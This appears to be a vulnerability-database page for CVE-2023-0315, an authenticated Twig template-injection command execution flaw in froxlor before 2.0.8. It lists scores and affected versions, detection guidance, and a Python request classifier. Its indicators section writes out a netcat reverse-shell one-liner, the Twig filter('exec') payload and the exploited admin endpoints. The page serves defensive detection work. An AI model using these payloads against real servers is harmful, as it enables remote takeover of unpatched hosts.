CVE-2023-0315
published 2023-01-16

CVE-2023-0315: Command Injection in GitHub repository froxlor/froxlor prior to 2.0.8.

Priority: P278 (high) · CVSS 3.1: 8.8
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 97.65% (99.9th percentile)

Affected

3 ranges

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| froxlor | froxlor | < 2.0.8 | 2.0.8 |
| froxlor | froxlor | >= 0 < 2.0.8 | 2.0.8 |
| froxlor | froxlor_froxlor | >= unspecified < 2.0.8 | 2.0.8 |

Detection & IOCs

path: /tmp/f
command: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> <port> >/tmp/f
command: {{['<cmd>']|filter('exec')}}
url: /admin_settings.php?page=overview&part=logging
url: /admin_index.php
  • Detect POST requests to /admin_settings.php?page=overview&part=logging that set the logger_logfile parameter to a path ending in .twig — this is the log-path manipulation step of the exploit.
  • Detect POST requests to /admin_index.php with a body containing the Twig SSTI filter-exec pattern: {{[' ... ']|filter('exec')}} — this is the template injection payload delivery step.
  • Detect POST requests to /admin_index.php with page=change_theme and a 'theme' parameter containing Twig expression syntax ({{ and }}) — indicates SSTI payload injection via the theme-change endpoint.
  • Monitor for mkfifo and netcat (nc) execution under the www-data process tree — these are spawned by the reverse shell one-liner written into the poisoned Twig template.
  • The exploit requires valid admin credentials; it is an authenticated RCE. Detection rules should focus on the post-login log-path change and template injection steps rather than the login itself.
  • The exploit targets Froxlor v2.0.7 and below; the vulnerability is patched in v2.0.8. Ensure version detection is part of asset inventory checks.
  • The reverse shell executes under the www-data user; privilege escalation is not part of this CVE's scope. Post-exploitation activity will appear as www-data spawning shells.
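
The three request-level detections listed above, as an added example (not code from the original page or from the froxlor project): a Python classifier run over constructed request records. The rule names, the sample log path and the benign theme value are assumptions; the URLs, parameter names and Twig pattern are the ones quoted above.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlencode, urlsplit

# Twig filter-exec shape quoted on the page: {{[' ... ']|filter('exec')}}
FILTER_EXEC = re.compile(
    r"\{\{\s*\[.*?\]\s*\|\s*filter\(\s*['\"]exec['\"]\s*\)\s*\}\}", re.S)
TWIG_EXPR = re.compile(r"\{\{.*?\}\}", re.S)

def classify(method, url, body=""):
    """Return the names (assumed labels) of the rules one request matches."""
    if method.upper() != "POST":
        return []
    parts = urlsplit(url)
    # Merge query-string and form-body parameters; parse_qs URL-decodes both.
    params = parse_qs(parts.query, keep_blank_values=True)
    for key, values in parse_qs(body, keep_blank_values=True).items():
        params.setdefault(key, []).extend(values)
    get = lambda key: params.get(key, [])
    hits = []
    if parts.path.endswith("/admin_settings.php"):
        # Log-path manipulation: logger_logfile pointed at a .twig file.
        if ("overview" in get("page") and "logging" in get("part") and any(
                v.strip().lower().endswith(".twig") for v in get("logger_logfile"))):
            hits.append("log-path-to-twig")
    elif parts.path.endswith("/admin_index.php"):
        # Payload delivery: filter('exec') pattern anywhere in query or body.
        if FILTER_EXEC.search(unquote_plus(parts.query + "&" + body)):
            hits.append("twig-filter-exec")
        # Theme-change variant: Twig expression syntax in the theme parameter.
        if "change_theme" in get("page") and any(
                TWIG_EXPR.search(v) for v in get("theme")):
            hits.append("twig-in-theme")
    return hits

# Constructed sample requests (method, URL, form body); not captured traffic.
SAMPLES = [
    ("POST", "/admin_settings.php?page=overview&part=logging",
     urlencode({"logger_logfile": "/constructed/path/example.html.twig"})),
    ("POST", "/admin_index.php",
     urlencode({"page": "change_theme", "theme": "{{['<cmd>']|filter('exec')}}"})),
    ("POST", "/admin_index.php",
     urlencode({"page": "change_theme", "theme": "Froxlor"})),
    ("GET", "/admin_settings.php?page=overview&part=logging", ""),
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample[0], sample[1], "->", classify(*sample) or "no match")
```

The mkfifo and nc process monitoring under www-data needs host telemetry and is outside what this request classifier covers.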

CVSS provenance

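| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | v3.0 | 7.2 | HIGH | CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H |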